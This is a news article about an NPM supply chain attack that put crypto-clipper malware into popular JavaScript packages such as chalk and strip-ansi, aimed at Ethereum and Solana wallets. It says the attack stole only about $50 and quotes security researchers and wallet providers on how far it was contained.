Massive NPM Supply Chain Hack Targets Crypto Wallets but Nets Just $50

Malicious actors are at it again, this time targeting the account of a well-known software developer’s Node Package Manager (NPM). Investigations revealed that the hackers added malware to popular JavaScript libraries, primarily attacking crypto wallets. However, after launching what industry sleuths describe as the largest supply chain attack in crypto history, the hackers managed to steal only $50 worth of crypto assets.

Malware in NPM Packages Puts Crypto Wallets at Risk, Targets Ethereum and Solana Wallets

According to the details shared by blockchain intelligence platform Security Alliance on Monday, malicious code sent by the attackers added malware to popular JavaScript libraries with over 1 billion downloads, exposing several crypto projects to risk. The crypto intelligence firm added that the hacker primarily targeted Ethereum and Solana wallets.

For context, NPMs function as central libraries or app stores where developers can download and share small packages to create JavaScript projects. Reports indicate that the hackers appear to have hooked a crypto-clipper, a type of malicious code that silently swaps wallet addresses during transactions to divert funds.

So far, the cybercriminals have succeeded in moving only $50 to a malicious Ethereum wallet. Security Alliance identified the wallet address, labeled “0xFc4a48,” which they believe to be the only compromised wallet.

Widespread NPM Malware Breach Contained After Limited Exploit

Commenting on the breach, pseudonymous SEAL security researcher Samczsun explained that the hacker had significant access but failed to exploit it fully. He added that although the malware was widespread, it has now been largely contained.

The hacker didn’t fully capitalize on the amount of access they had. It’s like finding the keycard to Fort Knox and using it as a bookmark. The malware was widespread but at this point is nearly completely neutralized. 

Samczsun

However, the current figure of $50 surged from a few cents hours earlier, suggesting that other events related to the hack may still unfold.

Security Alliance reported that five cents’ worth of Ethereum (ETH) and about $20 in memecoins were stolen. According to Etherscan data, the hacker has so far moved Brett (BRETT), Andy (ANDY), Dork Lord (DORK), Ethervista (VISTA), and Gondola (GONDOLA).

The hacker’s malware attacked packages such as chalk, strip-ansi, and color-convert—small utilities found deep in dependency trees that have been downloaded over 2 billion times. In fact, the security firm noted that even creators who never installed the program directly could be at risk.

Crypto Platforms Urge Caution After Supply Chain Hack Raises Security Concerns

Ledger chief technology officer Charles Guillemet called for caution among market participants when confirming on-chain transactions. Crypto wallet service providers Ledger and MetaMask maintained that their platforms remain safe from the breach, noting that their wallets are packed with “multiple layers of defense” to guard against such attacks.

Other crypto platforms, including Phantom, Uniswap, Aerodrome, and Blast, noted that they were unaffected by the supply chain hack. However, the founder of the crypto analytics platform DefiLlama, with the pseudonym 0xngmi, detailed that projects that updated after the malicious code-compromised NPM package was published may be exposed to significant risk.

Still, he clarified that users need to approve the malicious transaction before it can go through. However, DefiLlama advised users to avoid using crypto websites until the malware is totally cleaned up. 

With the increased growth of digital assets, crypto hacks have become common in recent years. Crypto platform SwissBorg recently suffered a massive breach, with the hackers moving about 193,000 SOL, worth $41 million.